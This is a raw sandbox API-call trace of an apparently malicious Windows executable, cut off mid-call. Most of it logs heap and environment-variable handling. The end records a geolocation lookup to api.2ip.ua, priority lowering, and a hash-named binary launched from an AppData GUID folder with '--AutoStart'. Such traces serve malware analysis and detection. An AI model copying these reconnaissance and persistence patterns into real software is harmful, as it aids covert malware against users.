GetLastError () returned 0x0 [0173.491] SetLastError (dwErrCode=0x0) [0173.491] GetLastError () returned 0x0 [0173.491] SetLastError (dwErrCode=0x0) [0173.491] GetLastError () returned 0x0 [0173.491] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1130) returned 0x40 [0173.491] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1130, Size=0x44) returned 0x2e1218 [0173.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0173.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1b) returned 0x2dee50 [0173.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x2dee50, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0173.491] GetLastError () returned 0x0 [0173.491] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x44 [0173.491] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x48) returned 0x2e1218 [0173.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0173.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1d) returned 0x2dee78 [0173.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x2dee78, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0173.491] GetLastError () returned 0x0 [0173.491] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x48 [0173.491] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x4c) returned 0x2e1218 [0173.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0173.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d7120 [0173.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x2d7120, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0173.491] GetLastError () returned 0x0 [0173.491] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x4c [0173.491] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x50) returned 0x2e1218 [0173.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0173.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12) returned 0x2e10d0 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x2e10d0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0173.492] GetLastError () returned 0x0 [0173.492] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x50 [0173.492] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x54) returned 0x2e1218 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0173.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e10f0 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x2e10f0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0173.492] GetLastError () returned 0x0 [0173.492] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x54 [0173.492] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x58) returned 0x2e1218 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0173.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1b) returned 0x2deea0 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2deea0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0173.492] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x58 [0173.492] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x5c) returned 0x2e1218 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0173.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2db080 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2db080, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0173.492] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x5c [0173.492] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x60) returned 0x2e1218 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0173.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x29) returned 0x2db760 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2db760, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0173.492] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x60 [0173.492] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x64) returned 0x2e1218 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0173.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2deec8 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x2deec8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0173.492] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x64 [0173.492] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x68) returned 0x2e1218 [0173.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0173.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6b) returned 0x2e1288 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x2e1288, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpUsedDefaultChar=0x0) returned 107 [0173.493] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1218) returned 0x68 [0173.493] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1218, Size=0x6c) returned 0x2e1300 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0173.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e1130 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x2e1130, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0173.493] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x6c [0173.493] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x70) returned 0x2e1300 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0173.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x14) returned 0x2e1150 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x2e1150, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SESSIONNAME=Console", lpUsedDefaultChar=0x0) returned 20 [0173.493] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x70 [0173.493] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x74) returned 0x2e1300 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0173.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf) returned 0x2d32b8 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x2d32b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0173.493] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x74 [0173.493] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x78) returned 0x2e1300 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0173.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x16) returned 0x2e1218 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2e1218, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0173.493] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x78 [0173.493] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x7c) returned 0x2e1300 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0173.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db798 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2db798, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0173.493] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x7c [0173.493] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x80) returned 0x2e1300 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0173.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x29) returned 0x2db7d0 [0173.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2db7d0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0173.500] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x80 [0173.500] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x84) returned 0x2e1300 [0173.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0173.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x16) returned 0x2e1238 [0173.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x2e1238, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 22 [0173.500] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x84 [0173.500] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x88) returned 0x2e1300 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0173.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x13) returned 0x2e1258 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x2e1258, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=kEecfMwgj", lpUsedDefaultChar=0x0) returned 19 [0173.501] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x88 [0173.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x8c) returned 0x2e1300 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0173.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1f) returned 0x2deef0 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x2deef0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 31 [0173.501] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x8c [0173.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x90) returned 0x2e1300 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0173.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12) returned 0x2e1398 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2e1398, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0173.501] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1300) returned 0x90 [0173.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1300, Size=0x94) returned 0x2e13b8 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0173.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e1300 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x2e1300, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0173.501] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13b8) returned 0x94 [0173.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13b8, Size=0x98) returned 0x2e13b8 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0173.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x46) returned 0x2d7170 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x2d7170, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0173.501] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13b8) returned 0x98 [0173.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13b8, Size=0x9c) returned 0x2e13b8 [0173.528] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0918) returned 0x80 [0173.528] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0918) returned 0x80 [0173.529] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0918) returned 0x80 [0173.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x2e1fd0 [0173.541] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0918) returned 0x80 [0173.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2d32d0 [0173.541] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0918) returned 0x80 [0173.541] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0918) returned 0x80 [0173.541] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0918) returned 0x80 [0173.559] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0918) returned 0x80 [0173.572] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0173.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2d2930 [0173.954] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0177.046] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18c1c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e9c8 | out: lpBuffer=0x18c1c8*, lpdwNumberOfBytesRead=0x18e9c8*=0x22a) returned 1 [0177.046] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0177.046] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0177.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2f4b28 [0177.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x240) returned 0x2fd2a0 [0177.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd2a0 | out: hHeap=0x2c0000) returned 1 [0177.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b28 | out: hHeap=0x2c0000) returned 1 [0177.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d2930 | out: hHeap=0x2c0000) returned 1 [0177.108] GetCurrentProcess () returned 0xffffffff [0177.108] GetLastError () returned 0x0 [0177.108] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0177.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2f6fa8 [0177.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x2fd2a0 [0177.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2a07cd0 [0177.172] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a07cd0, nSize=0x400 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x8a [0177.172] PathRemoveFileSpecW (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac") returned 1 [0177.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a084d8 [0177.184] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart" [0177.186] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart", pNumArgs=0x18eaa8 | out: pNumArgs=0x18eaa8) returned 0x303528*="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0177.187] lstrcpyW (in: lpString1=0x18f738, 